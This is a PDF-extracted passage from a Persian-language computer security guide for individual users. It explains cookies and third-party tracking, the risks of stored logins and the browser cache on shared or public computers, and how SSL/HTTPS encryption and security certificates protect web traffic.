ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﻭﺟﻮﺩ cookieﻫﺎ ﺭﺍ ﻣﺠﺎﺯ ﺑﺪﺍﻧﻴﺪ ﻳﺎ ﺧﻴﺮ .ﺩﺭ ﺑﺮﺧﻲ
ﻣﻮﺍﺭﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺮﻭﺭﮔﺮ ﻣﻴﺎﻥ cookieﻫﺎﻳﻲ ﻛـﻪ ﺩﺭ ﺭﺍﻳﺎﻧـﺔ
ﺷﻤﺎ ﺫﺧﻴﺮﻩ ﺷﺪﻩ ﺍﻧﺪcookie ،ﻫﺎﻳﻲ ﻛﻪ ﻫﻨﮕﺎﻡ ﺑـﺴﺘﻦ ﻣﺮﻭﺭﮔـﺮ
ﻧﺎﭘﺪﻳﺪ ﻣﻲﺷﻮﻧﺪ ﻭ ﺁﻧﺪﺳﺘﻪ ﻛﻪ ﻫﻨﮕﺎﻡ ﻣﺸﺎﻫﺪﺓ ﭘﺎﻳﮕﺎﻩﻫﺎﻱ ﻭﺏ ﻭ
Session
Foreign Site
Third-Party Site
۸۶
ﻓﺮﺽ ﻛﻨﻴﺪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ Aﻭ Bﻭ Cﻭ Dﻫﻤﮕﻲ ﻳﻚ ﺗﺼﻮﻳﺮ ﻧﺎﻣﺮﺋﻲ
ﺍﺯ ﭘﺎﻳﮕﺎﻩ Zﻧﻤﺎﻳﺶ ﻣﻲﺩﻫﻨﺪ .ﻭﻗﺘﻲ ﺗﺼﻮﻳﺮ ﻣﺮﺑﻮﻃﻪ ﺩﺭ ﻣﺮﻭﺭﮔﺮ ﺷﻤﺎ ﺑﻪ
ﻧﻤﺎﻳﺶ ﺩﺭ ﻣﻲﺁﻳﺪ Z ،ﻣﻄﻠﻊ ﻣﻲﺷﻮﺩ ﻛﻪ ﺍﺯ ﻛﺪﺍﻡ ﭘﺎﻳﮕﺎﻩ ﺑـﻪ ﺁﻥ ﺍﺷـﺎﺭﻩ
ﺷﺪﻩ ﺍﺳﺖ ،ﻭ ﺳﭙﺲ cookieﻫﺎﻳﻲ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﺪ ﺗﺎ ﺑﻪ ﺧﺎﻃﺮ ﺑﺴﭙﺎﺭﺩ
ﻛﻪ ﺷﻤﺎ ﺍﺯ ﻛﺪﺍﻡ ﭘﺎﻳﮕﺎﻫﻬﺎ ﺩﻳﺪﻥ ﻛﺮﺩﻩ ﺑﻮﺩﻳﺪ .ﺍﺯ ﺍﻳﻦ ﭘـﺲ Zﺩﺭ ﻣـﻮﺭﺩ
ﺍﻳﻨﻜﻪ ﭼﻪ ﭼﻴﺰﻫﺎﻳﻲ ﻣﻮﺭﺩ ﻋﻼﻗﺔ ﺷﻤﺎ ﺍﺳﺖ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺑﻲ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ
ﺩﺍﺭﺩ ﻭ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﺍﺭﺳﺎﻝ ﺗﺒﻠﻴﻐﺎﺕ ﺑﻪ ﺷﻤﺎ ﺍﺳـﺘﻔﺎﺩﻩ
ﻛﻨﺪ.
83
84
85
ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺧﺎﺭﺟﻲ ﺫﺧﻴﺮﻩ ﻣﻲﮔﺮﺩﻧـﺪ ﺗﻔـﺎﻭﺕ ﻗﺎﺋـﻞ ﺷـﻮﺩ.
ﺍﺳﺎﺳﹰﺎ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺟﺎﺯﺓ ﺫﺧﻴﺮﺓ ﻫﻤﺔ cookieﻫﺎ ﺭﺍ ﺑﺪﻫﻴﺪ ،ﺍﺯ
ﺫﺧﻴﺮﺓ ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﻴﺪ ،ﻭ ﻳﺎ ﺍﺯ ﻣﺮﻭﺭﮔﺮ ﺑﺨﻮﺍﻫﻴﺪ ﻛﻪ ﻗﺒﻞ ﺍﺯ
ﺫﺧﻴﺮﺓ ﺁﻧﻬﺎ ﺍﺯ ﺷﻤﺎ ﺳﺆﺍﻝ ﻧﻤﺎﻳﺪ .ﺷﻤﺎ ﻫﺮﮔﺰ ﻣﻄﻠﻊ ﻧﻤﻲﺷﻮﻳﺪ ﻛﻪ
ﭼﻪ ﺯﻣﺎﻧﻲ ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩ ﺷﺪﻩ ﺩﺭ ﻳـﻚ cookieﺑـﻪ ﭘﺎﻳﮕـﺎﻩ
ﻭﺏ ﻣﺒﺪﺃ ﺑﺎﺯﻣﻲﮔﺮﺩﺩ.
Cookieﻫﺎ ﺭﺍ ﻣﻲﺗـﻮﺍﻥ ﺑﺮﺭﺳـﻲ ﻧﻤـﻮﺩ ﺯﻳـﺮﺍ ﺩﺭ ﻗﺎﻟـﺐ ﻣﺘﻨـﻲ
ﻫﺴﺘﻨﺪ ،ﺍﻣﺎ ﭼﻮﻥ ﺍﻃﻼﻋـﺎﺕ ﻣﻮﺟـﻮﺩ ﺩﺭ ﺁﻥ ﺗﻮﺳـﻂ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ
ﻻ ﻗﺎﺑﻞ ﻓﻬﻢ ﻧﻤﻲﺑﺎﺷﻨﺪ .ﺑﺮﺧﻲ ﺍﺯ
ﻣﺒﺪﺃ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﺩ ﻣﻌﻤﻮ ﹰ
ﻣﺮﻭﺭﮔﺮﻫﺎ ﺍﺟﺎﺯﺓ ﻧﻤﺎﻳﺶ ﻭ ﺣـﺬﻑ cookieﻫـﺎ ﺭﺍ ﻣـﻲﺩﻫﻨـﺪ ﻭ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺛﺎﻟﺜﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛـﻪ ﺍﺟـﺎﺯﺓ ﻣـﺪﻳﺮﻳﺖ ﺁﻧﻬـﺎ ﺭﺍ ﻧﻴـﺰ
ﺑﺮﺍﻱ ﺷﻤﺎ ﻓﺮﺍﻫﻢ ﻣﻲﺁﻭﺭﻧﺪ.
ﺍﮔﺮ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﻳـﻚ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺩﺭ ﻣـﻮﺭﺩ ﺷـﻤﺎ
ﻣﻲ ﺩﺍﻧﺪ ﺭﺍ ﻛﻨﺘﺮﻝ ﻛﻨﻴﺪ ﺑﺎﻳـﺪ ﺯﻣـﺎﻥ ﻭ ﭼﮕـﻮﻧﮕﻲ ﺫﺧﻴـﺮﻩﺷـﺪﻥ
cookieﻫﺎ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﻛﻨﺘـﺮﻝ ﻧﻤﺎﻳﻴـﺪ .ﺗﻮﺟـﻪ ﺩﺍﺷـﺘﻪ
ﺑﺎﺷﻴﺪ ﻛﻪ ﺑﺮﺧﻲ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺑﺪﺭﺳﺘﻲ
ﻋﻤﻞ ﻧﻤﺎﻳﻨﺪ ﻧﻴﺎﺯﻣﻨـﺪ ﺫﺧﻴـﺮﺓ cookieﻫـﺎ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﺔ ﻛـﺎﺭﺑﺮ
ﻣﻲﺑﺎﺷﻨﺪ .ﻋﻤﻮﻣﹰﺎ ﺍﻳﻦ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺩﺭﺻﻮﺭﺕ ﻏﻴﺮﻓﻌﺎﻝ ﺑﻮﺩﻥ
cookieﻫﺎ ﺑﻪ ﺷﻤﺎ ﺍﻃﻼﻉ ﻣﻲﺩﻫﻨـﺪ ﻛـﻪ ﻗـﺎﺩﺭ ﺑـﻪ ﺍﻧﺠـﺎﻡ ﻳـﺎ
ﺗﻜﻤﻴﻞ ﻋﻤﻠﻴﺎﺕ ﻧﻴﺴﺘﻨﺪ.
ﺍﮔﺮ ﺩﺭ ﺍﻣﺎﻛﻦ ﻋﻤـﻮﻣﻲ )ﻣﺜـﻞ ﻛـﺎﻓﻲﻧـﺖ ،ﻛﺘﺎﺑﺨﺎﻧـﻪﻫـﺎ ،ﻣـﺪﺍﺭﺱ( ﺍﺯ
ﻣﺮﻭﺭﮔﺮﻫــﺎﻱ ﻭﺏ ﺍﺳــﺘﻔﺎﺩﻩ ﻣــﻲﻛﻨﻴــﺪ ﺗﻮﺟــﻪ ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻴﺪ
cookieﻫﺎﻳﻲ ﻛﻪ ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ ﻫﺴﺘﻨﺪ ﺩﺭ ﺁﻧﻬﺎ ﺫﺧﻴـﺮﻩ
ﻣﻲﺷﻮﻧﺪ .ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﺭﺍﻫﺒﺮ ﺭﺍﻳﺎﻧﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺷﻤﺎ
ﺁﻧﻘﺪﺭ ﺩﺳﺘﺮﺳﻲ ﻧﺪﺍﺩﻩ ﺑﺎﺷﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻴـﺪ cookieﻫـﺎ ﺭﺍ ﻛﻨﺘـﺮﻝ،
ﻧﻈﺎﺭﻩ ﻭ ﻳﺎ ﭘﺎﻙ ﻛﻨﻴﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﻃﻼﻋـﺎﺕ ﺷـﻤﺎ ﺩﺭ ﺍﻳـﻦ ﺭﺍﻳﺎﻧـﻪ
ﻣﻲﻣﺎﻧﺪ ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻮﺳﻴﻠﺔ ﻓﺮﺩ ﺩﻳﮕﺮﻱ ﻛـﻪ ﻫﻤـﺎﻥ ﭘﺎﻳﮕـﺎﻩ
ﻭﺏ ﺭﺍ ﻣﺸﺎﻫﺪﻩ ﻣﻲﻛﻨﺪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ .ﺍﮔﺮ ﺑﻪ ﭘﺎﻳﮕـﺎﻩ
ﻭﺑﻲ ﻭﺍﺭﺩ ﺷﺪﻩ ﺑﺎﺷﻴﺪ ﻭ ﺍﻃﻼﻋﺎﺕ ﻣﻌﺘﺒﺮ ﺷﻤﺎ ﺩﺭ ﻳـﻚ cookie
ﺫﺧﻴﺮﻩ ﺷﺪﻩ ﺑﺎﺷﺪ ﻭ ﻛﺎﺭﺑﺮ ﺩﻳﮕﺮﻱ ﺑﻪ ﻫﻤﺎﻥ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﺮﺍﺟﻌـﻪ
ﻧﻤﺎﻳﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺑﺠﺎﻱ ﺷﻤﺎ ﻭﺍﺭﺩ ﺁﻥ ﭘﺎﻳﮕﺎﻩ
ﮔــﺮﺩﺩ .ﺩﺭﻧﺘﻴﺠــﻪ ﺍﺣﺘﻤــﺎﻝ ﺩﺍﺭﺩ ﻛــﻪ ﭘﺎﻳﮕــﺎﻩ ﻭﺏ ﺍﻃﻼﻋــﺎﺕ
ﺫﺧﻴﺮﻩﺷﺪﺓ ﺷﻤﺎ )ﻣﺎﻧﻨﺪ ﻧﺎﻡ ،ﺁﺩﺭﺱ ﻭ ﺍﻃﻼﻋـﺎﺕ ﻛـﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ( ﺭﺍ ﺩﺭ
ﺍﺧﺘﻴﺎﺭ ﺍﻳﻦ ﻛﺎﺭﺑﺮ ﻗﺮﺍﺭ ﺩﻫﺪ.
ﺍﻳﻦ ﻣﻮﺭﺩ ﺣﺘﻲ ﺩﺭ ﻳﻚ ﺭﺍﻳﺎﻧـﺔ ﺧـﺼﻮﺻﻲ ﻛـﻪ ﭼﻨـﺪ ﻧﻔـﺮ ﺍﺯ ﺁﻥ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﻣﺸﻜﻞﺳﺎﺯ ﺷـﻮﺩ .ﺩﺭ ﺍﻳـﻦ ﻣـﻮﺍﺭﺩ
٨٧
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﺣﺎﻓﻈﺔ ﻧﻬﺎﻥ ٨٧ﻣﺮﻭﺭﮔﺮ ﻭﺏ
ﺍﻧﺘﻘﺎﻝ ﺍﻣﻦ
ﻫﻨﮕﺎﻣﻴﻜﻪ ﻳﻚ ﻣﺮﻭﺭﮔﺮ ﺻﻔﺤﻪ ﻳﺎ ﺗـﺼﻮﻳﺮﻱ ﺭﺍ ﺍﺯ ﻳـﻚ ﭘﺎﻳﮕـﺎﻩ
ﻻ ﻳـﻚ ﻧـﺴﺨﻪ ﺍﺯ ﺻـﻔﺤﺔ ﺩﺭﺣـﺎﻝ
ﻭﺏ ﺑﺎﺯﻳﺎﺑﻲ ﻣﻲﻛﻨـﺪ ﻣﻌﻤـﻮ ﹰ
ﻧﻤﺎﻳﺶ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺩﻳﺴﻚ ﺳﺨﺖ ﺭﺍﻳﺎﻧﻪ ﺫﺧﻴﺮﻩ ﻣـﻲﻧﻤﺎﻳـﺪ .ﺍﻳـﻦ
ﻣﺠﻤﻮﻋﺔ ﺻﻔﺤﺎﺕ ﻭ ﺗﺼﺎﻭﻳﺮ ﺫﺧﻴﺮﻩﺷﺪﻩ "ﺣﺎﻓﻈﺔ ﻧﻬـﺎﻥ" ﻧﺎﻣﻴـﺪﻩ
ﻣﻲﺷﻮﻧﺪ .ﺍﮔﺮ ﺍﻳﻦ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺭﺍ ﻣﺠﺪﺩﹰﺍ ﻣﺸﺎﻫﺪﻩ ﻛﻨﻴﺪ ﻭ ﺻﻔﺤﺔ
ﺁﻥ ﺗﻐﻴﻴﺮ ﻧﻜﺮﺩﻩ ﺑﺎﺷﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺮﻭﺭﮔـﺮ ﻛـﻞ ﺻـﻔﺤﻪ ﺭﺍ ﺍﺯ
ﺍﺑﺘﺪﺍ downloadﻧﻜﻨﺪ ،ﺑﻠﻜﻪ ﺑﺮﺍﻱ ﻧﻤﺎﻳﺶ ﺁﻥ ﺍﺯ ﺣﺎﻓﻈﺔ ﻧﻬﺎﻥ
ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﺪ .ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﺻـﻔﺤﺎﺕ ﻭﺑـﻲ ﻛـﻪ ﺩﺭ ﺣﺎﻓﻈـﺔ
ﻧﻬﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺑﺼﻮﺭﺕ ) offlineﻳﻌﻨﻲ ﺑﺪﻭﻥ ﺍﺗـﺼﺎﻝ
ﺍﻳﻨﺘﺮﻧﺘﻲ( ﻧﻴﺰ ﺩﻳﺪﻩ ﺷﻮﻧﺪ .ﺍﻳﻦ ﺑﺪﺍﻥ ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﻫﺮﺁﻧﭽﻪ ﺗﻮﺳـﻂ
ﻣﺮﻭﺭﮔﺮ ﻣﺸﺎﻫﺪﻩ ﻣﻲﻛﻨﻴﺪ ﺩﺭ ﺩﻳﺴﻚ ﺳﺨﺖ ﺭﺍﻳﺎﻧﻪ ﺫﺧﻴﺮﻩ ﺷـﺪﻩ
ﺍﺳﺖ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﮔﺮ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻣﻌﺎﻣﻼﺕ ﻣـﺎﻟﻲ ﺍﺯ ﻭﺏ ﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲﻛﻨﻴﺪ ،ﺍﻃﻼﻋﺎﺕ ﺧﺮﻳﺪ ،ﻛﺎﺭﺗﻬﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ ﻭ ﺣﺴﺎﺑﻬﺎﻱ ﺑﺎﻧﻜﻲ
ﺷﻤﺎ ﺩﺭ ﺁﻥ ﺭﺍﻳﺎﻧﻪ ﻛﺎﻣ ﹰ
ﻼ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﻭ ﺑﺎﺯﻳـﺎﺑﻲ ﺧﻮﺍﻫﻨـﺪ ﺷـﺪ.
ﺑﺎﺗﻮﺟﻪ ﺑﻪ ﻣﻴﺰﺍﻥ ﻣﺮﻭﺭ ﻭ ﺍﻧﺪﺍﺯﺓ ﺣﺎﻓﻈﺔ ﻧﻬـﺎﻥ ،ﺍﻳـﻦ ﺻـﻔﺤﺎﺕ ﻭ
ﺗﺼﺎﻭﻳﺮ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﺎ ﻣﺪﺗﻬﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﺑﺎﻗﻲ ﺑﻤﺎﻧﻨﺪ.
ﻛﻠﻴﺔ ﭘﻴﺎﻣﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﻭﺏ ﺩﺭﻳﺎﻓﺖ ﻭ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﻴـﺪ ﺑـﺼﻮﺭﺕ
ﻣﺘﻦﺳﺎﺩﻩ ﻫﺴﺘﻨﺪ .ﺍﻳﻦ ﺑﺪﺍﻥ ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﺍﮔﺮ ﻓﺮﺩﻱ ﺑﺘﻮﺍﻧﺪ ﺍﻳـﻦ
ﻣﺘﻨﻬﺎ ﺭﺍ ﻣﻴـﺎﻥ ﺭﺍﻩ ﺭﺍ ﺑـﺪﺯﺩ ،ﺑـﺮﺍﻱ ﻭﻱ ﻗﺎﺑـﻞ ﻓﻬـﻢ ﻭ ﺧﻮﺍﻧـﺪﻥ
ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ .ﺍﮔﺮ ﺑﺨﺸﻲ ﺍﺯ ﺍﺭﺗﺒﺎﻁ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﻪ ﺷـﻜﻞ ﺑـﻲﺳـﻴﻢ
ﺑﺎﺷﺪ ﻭ ﻳﺎ ISPﺍﻧﺘﻬﺎﻱ ﺍﺭﺗﺒﺎﻁ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻧﺒﺎﺷﺪ ﺩﺯﺩﻱ ﭘﻴـﺎﻡ
ﺍﺯ ﻣﻴﺎﻥ ﺭﺍﻩ ﺭﺍﺣﺖﺗﺮ ﻣﻲﺷﻮﺩ ﻭ ﻟﺬﺍ ﺗﻮﺟﻪ ﺑـﻪ ﺁﻥ ﺍﻫﻤﻴـﺖ ﺑـﺴﻴﺎﺭ
ﺑﻴﺸﺘﺮﻱ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ.
ﻗﺎﻧﻮﻥ ﭼﻬﺎﺭﺩﻫﻢ:
ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﻃﻼﻋﺎﺕ ﺧﺼﻮﺻﻲ ﺷﻤﺎ ﺩﺭ ﺻﻔﺤﺔ ﻭﺏ
ﻧﻤﺎﻳﺶ ﺩﺍﺩﻩ ﺷﺪ ،ﭘﺲ ﺍﺯ ﺍﺗﻤﺎﻡ ﻛـﺎﺭ ﺑﺎﻳـﺪ ﺣﺎﻓﻈـﺔ
ﻧﻬﺎﻥ ﺭﺍ ﭘﺎﻙ ﻧﻤﺎﻳﻴﺪ .ﺍﮔﺮ ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠـﺎﻡ
ﺩﻫﻴﺪ )ﻣﺜ ﹰﻼ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﺯ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﻋﻤﻮﻣﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ(
ﻧﺒﺎﻳﺪ ﺍﺯ ﺁﻥ ﺭﺍﻳﺎﻧﻪ ﺑﺮﺍﻱ ﺗﺒـﺎﺩﻝ ﺍﻃﻼﻋـﺎﺕ ﻣﺤﺮﻣﺎﻧـﺔ
ﺷﺨﺼﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ.
ﻛﻠﻴﺔ ﻣﺮﻭﺭﮔﺮﻫﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨﺪ ﺣﺎﻓﻈﺔ ﻧﻬﺎﻥ )ﻛﻪ ﻓﺎﻳﻠﻬـﺎﻱ ﻣـﻮﻗﺘﻲ
ﺍﻳﻨﺘﺮﻧـﺖ ٨٨ﻧﺎﻣﻴـﺪﻩ ﻣـﻲﺷـﻮﺩ( ﺭﺍ ﺍﺯ ﺭﻭﻱ ﺳﻴـﺴﺘﻢ ﭘـﺎﻙ ﻛﻨﻴـﺪ؛ ﺍﻣـﺎ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﺍﻣﺎﻛﻦ ﻋﻤﻮﻣﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ
ﻣﻲﮔﻴﺮﻧﺪ ﺍﺟﺎﺯﺓ ﻛﻨﺘﺮﻝ ﻭ ﺣـﺬﻑ ﺣﺎﻓﻈـﺔ ﻧﻬـﺎﻥ ﺭﺍ ﻧﻤـﻲﺩﻫﻨـﺪ.
ﺍﮔﺮﭼﻪ ﭘﺎﻙ ﻛﺮﺩﻥ ﺍﻳﻦ ﺣﺎﻓﻈﻪ ﭘﺲ ﺍﺯ ﻭﺭﻭﺩ ﺍﻃﻼﻋﺎﺕ ﺣـﺴﺎﺱ
ﺍﺯ ﺍﻫﻤﻴﺖ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ ،ﺍﻣﺎ ﺗـﺎ ﺑـﻪ ﺣـﺎﻝ ﻫـﻴﭻ
Cache
Temporary Internet Files
87
88
ﻣﺮﻭﺭﮔﺮﻫﺎ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ ﺑﺮﺍﻱ ﺣﻞ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﺍﺯ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻬﺮﻩ ﻣﻲﺑﺮﻧﺪ .ﺭﻣﺰﮔـﺬﺍﺭﻱ ﭘﻴـﺎﻡ ﺭﺍ ﺗﻐﻴﻴـﺮ ﻣـﻲﺩﻫـﺪ؛
ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﻏﻴﺮﻣﺠﺎﺯ ﺑﺴﻴﺎﺭ ﺳﺨﺖ ﻭ ﺣﺘـﻲ ﻏﻴـﺮﻣﻤﻜﻦ
ﻣﻲﺷﻮﺩ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﭘﻴﺎﻡ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺑﺨﻮﺍﻧﻨﺪ )ﺑﺮﺍﻱ ﺟﺰﺋﻴـﺎﺕ
ﺑﻴــﺸﺘﺮ ﺿــﻤﻴﻤﺔ ۱ﻫﻤــﻴﻦ ﺑﺨــﺶ ﺭﺍ ﻣﻄﺎﻟﻌــﻪ ﻧﻤﺎﻳﻴــﺪ( .ﻧــﺎﻡ ﭘﺮﻭﺗﻜــﻞ
ﺭﻣﺰﮔﺬﺍﺭﻱ " ٨٩"SSLﺍﺳـﺖ .ﻣـﻲ ﺗﻮﺍﻧﻴـﺪ ﺑـﺮﺍﻱ ﭘﻴﺎﻣﻬـﺎﻳﻲ ﻛـﻪ
ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴﺪ ﺍﺯ SSLﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴـﺪ .ﺩﺭ ﺍﻛﺜـﺮ ﻣﺮﻭﺭﮔﺮﻫـﺎ
ﺗﺼﻮﻳﺮ ﻛﻮﭼﻜﻲ ﺍﺯ ﻳﻚ ﻗﻔﻞ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻝ ﻋـﺎﺩﻱ
ﭘﻴﺎﻡ ﺑﺎﺯ ﺍﺳﺖ ﻭ ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻻﺗﻲ ﺍﺯ ﻧﻮﻉ SSLﺑﻪ ﺣﺎﻟﺖ ﺑﺴﺘﻪ ﺩﺭ
ﻣــﻲﺁﻳــﺪ .ﺩﺭ ﺍﻳﻨﺤﺎﻟــﺖ URLﺁﻥ ﺻــﻔﺤﻪ ﺑﺠــﺎﻱ " "httpﺑــﺎ
" "httpsﺁﻏﺎﺯ ﻣﻲﺷـﻮﺩ .ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺩﺭ ﻛـﺸﻮﺭﺗﺎﻥ ﺍﻣﻜـﺎﻥ ﺁﻥ
ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﺪ ،ﺑﻬﺘـﺮ ﺍﺳـﺖ ﻫﻤـﻮﺍﺭﻩ ﺍﺯ ﻗـﻮﻱﺗـﺮﻳﻦ ﺭﻭﺵ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ.
ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺍﻳﻦ ﻗﻔﻞ ﻣﺸﺨﺺ ﻧﻤﻲﻛﻨﺪ ﭘﻴﺎﻣﻲ ﻛﻪ ﺍﺯ
ﻃﺮﻑ ﺷﻤﺎ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﺩ ﺑـﺮﺍﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ
ﺍﺯ SSLﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﺍﺳﺖ ﻳﺎ ﻧﻪ ،ﺍﻣﺎ ﻓﺮﺽ ﺑﺮ ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ
ﺍﮔﺮ ﺻﻔﺤﺔ ﺍﺭﺳﺎﻟﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺑﺎﺷﺪ ،ﭘﻴـﺎﻡ ﺑﺎﺯﮔـﺸﺘﻲ ﻧﻴـﺰ
ﺑﺼﻮﺭﺕ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﻣﻨﺘﻘﻞ ﻣﻲﺷﻮﺩ.
SSLﺗﻨﻬﺎ ﺯﻣﺎﻧﻲ ﻛﺎﺭ ﻣﻲﻛﻨﺪ ﻛﻪ ﻣﺮﻭﺭﮔـﺮ ﺑﺪﺍﻧـﺪ ﻣﺨﺎﻃـﺐ ﺁﻥ
ﻛﻴــﺴﺖ .ﺍﻳــﻦ ﺍﻣــﺮ ﺑــﻪ ﻛﻤــﻚ ﮔــﻮﺍﻫﻲ ﺍﻣﻨﻴﺘــﻲ ٩٠ﻭ ﺍﻣــﻀﺎﻱ
ﺩﻳﺠﻴﺘﺎﻟﻲ ٩١ﺻﻮﺭﺕ ﻣﻲﭘﺬﻳﺮﺩ .ﺑﻄﻮﺭ ﻛﻠﻲ ﺍﮔـﺮ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ
ﻭﺏ ﺑﺨﻮﺍﻫﺪ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﺑﺎﺷﺪ ﺑﺎﻳﺪ ﺍﺯ ﻳﻚ ﻣﺮﻛﺰ ﻣﻌﺘﺒﺮ ﺻﺪﻭﺭ
ﮔﻮﺍﻫﻲ ،ﮔﻮﺍﻫﻲ ﺍﻣﻨﻴﺘﻲ ﺗﻬﻴﻪ ﻧﻤﺎﻳـﺪ .ﺍﮔـﺮ ﺍﻳـﻦ ﻣﺮﻛـﺰ ﺑﺨﻮﺍﻫـﺪ
Secure Socket Layer
Security Certificate
Digital Signature
89
90
91
